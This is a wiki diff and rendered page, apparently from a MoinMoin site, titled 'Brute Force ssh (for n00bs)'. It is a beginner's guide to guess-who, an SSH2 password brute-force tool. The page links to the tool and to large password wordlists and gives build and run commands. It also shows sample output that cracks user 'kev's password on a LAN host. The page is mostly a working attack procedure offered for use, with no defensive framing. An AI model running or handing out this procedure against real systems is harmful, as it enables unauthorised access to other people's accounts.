Differenze tra le versioni 9 e 10
|
Dimensione: 2458
Commento: tolto CategoryEnglishPages
|
← Versione 10 del 2008-03-18 17:28:28 ⇥
Dimensione: 2478
Commento: converted to 1.6 markup
|
| Le cancellazioni sono segnalate in questo modo. | Le aggiunte sono segnalate in questo modo. |
| Linea 6: | Linea 6: |
| Guess-who is a password brute force utility for attacking Secure Shell Version 2 accounts. [[BR]] It is available from http://packetstormsecurity.org/ [[BR]] |
Guess-who is a password brute force utility for attacking Secure Shell Version 2 accounts. <<BR>> It is available from http://packetstormsecurity.org/ <<BR>> |
| Linea 11: | Linea 11: |
| It is ''' NOT ''' required to download ALL files here. Please read ''' CAREFULLY! ''' [[BR]] * Choose ''' 1 ''' from the following: [[BR]] |
It is ''' NOT ''' required to download ALL files here. Please read ''' CAREFULLY! ''' <<BR>> * Choose ''' 1 ''' from the following: <<BR>> |
| Linea 14: | Linea 14: |
| || [http://www.ac3bf1.org/files/sec/all_merged.tar.gz all_merged.tar.gz] || [http://www.ac3bf1.org/files/sec/all_merged.zip all_merged.zip] || ('''~20MB!''' - 67MB uncompressed) || - Several passwords || || [http://www.ac3bf1.org/files/sec/common_merged.tar.gz common_merged.tar.gz] || [http://www.ac3bf1.org/files/sec/common_merged.zip common_merged.zip] || (~6.5MB - 18MB uncompressed) || - Selection of common passwords || |
|| [[http://www.ac3bf1.org/files/sec/all_merged.tar.gz|all_merged.tar.gz]] || [[http://www.ac3bf1.org/files/sec/all_merged.zip|all_merged.zip]] || ('''~20MB!''' - 67MB uncompressed) || - Several passwords || || [[http://www.ac3bf1.org/files/sec/common_merged.tar.gz|common_merged.tar.gz]] || [[http://www.ac3bf1.org/files/sec/common_merged.zip|common_merged.zip]] || (~6.5MB - 18MB uncompressed) || - Selection of common passwords || |
| Linea 17: | Linea 17: |
| [[BR]] | <<BR>> |
| Linea 19: | Linea 19: |
| * Required Program: [[BR]] [http://www.ac3bf1.org/files/sec/guess-who-0.44.tgz guess-who-0.44.tgz] (16.1 KB) - Linux program to Brute Force SSH [[BR]] * In case you would want to personalize your password files, the folowing is a Wind0ws utility to merge text files [[BR]] [http://www.ac3bf1.org/files/sec/uumerge.zip uumerge.zip] (55.1 KB) Wind0ws merging program [[BR]] |
* Required Program: <<BR>> [[http://www.ac3bf1.org/files/sec/guess-who-0.44.tgz|guess-who-0.44.tgz]] (16.1 KB) - Linux program to Brute Force SSH <<BR>> * In case you would want to personalize your password files, the folowing is a Wind0ws utility to merge text files <<BR>> [[http://www.ac3bf1.org/files/sec/uumerge.zip|uumerge.zip]] (55.1 KB) Wind0ws merging program <<BR>> |
| Linea 24: | Linea 24: |
| [http://www.ac3bf1.org/files/sec/common.tar.gz common.tar.gz] | [http://www.ac3bf1.org/files/sec/common.zip common.zip] (35 files - 6322.2 KB) - Several passwords not merged '''(~6MB)''' [[BR]] [http://www.ac3bf1.org/files/sec/all.tar.gz all.tar.gz] | [http://www.ac3bf1.org/files/sec/all.zip all.zip] (46 files - 19130.5 KB) - Selection of common passwords not merged '''(~20MB!)''' [[BR]] |
[[http://www.ac3bf1.org/files/sec/common.tar.gz|common.tar.gz]] | [[http://www.ac3bf1.org/files/sec/common.zip|common.zip]] (35 files - 6322.2 KB) - Several passwords not merged '''(~6MB)''' <<BR>> [[http://www.ac3bf1.org/files/sec/all.tar.gz|all.tar.gz]] | [[http://www.ac3bf1.org/files/sec/all.zip|all.zip]] (46 files - 19130.5 KB) - Selection of common passwords not merged '''(~20MB!)''' <<BR>> |
| Linea 29: | Linea 29: |
| Installation: [[BR]] Download to the desired directory [[BR]] |
Installation: <<BR>> Download to the desired directory <<BR>> |
| Linea 35: | Linea 35: |
| [[BR]] Execution: [[BR]] |
<<BR>> Execution: <<BR>> |
| Linea 46: | Linea 46: |
| Expected output: [[BR]] | Expected output: <<BR>> |
| Linea 52: | Linea 52: |
| As you can see the user kev has a password of arsenal [[BR]] | As you can see the user kev has a password of arsenal <<BR>> |
Brute Force ssh (for n00bs)
Guess-who is a password brute force utility for attacking Secure Shell Version 2 accounts.
It is available from http://packetstormsecurity.org/
Required Files and programs
It is NOT required to download ALL files here. Please read CAREFULLY!
Choose 1 from the following:
(~20MB! - 67MB uncompressed)
- Several passwords
(~6.5MB - 18MB uncompressed)
- Selection of common passwords
Required Program:
guess-who-0.44.tgz (16.1 KB) - Linux program to Brute Force SSH
In case you would want to personalize your password files, the folowing is a Wind0ws utility to merge text files
uumerge.zip (55.1 KB) Wind0ws merging program
- The following are to be chosen if you want to create personalized password files.
common.tar.gz | common.zip (35 files - 6322.2 KB) - Several passwords not merged (~6MB)
all.tar.gz | all.zip (46 files - 19130.5 KB) - Selection of common passwords not merged (~20MB!)
Procedure
Installation:
Download to the desired directory
tar -zxvf guess-who-0.44.tgz make
Execution:
[root@hacker guess-who]# ./b guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer@cs.uni-potsdam.de Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads] [-n ntries] Use -1 for producer/consumer thread model, -2 for dumb parallelism. < Password file
Expected output:
[root@hacker guess-who]# ./b -l kev -h l192.168.1.1 -p 22 -2 < /passwords.txt (!)056 ][ 00013 ][ 00000004.307361 ][ kev ][ arsenal ] [ 00061 ][ 00015 ][ 00000004.066396 ][ kev ][ e3d ]
As you can see the user kev has a password of arsenal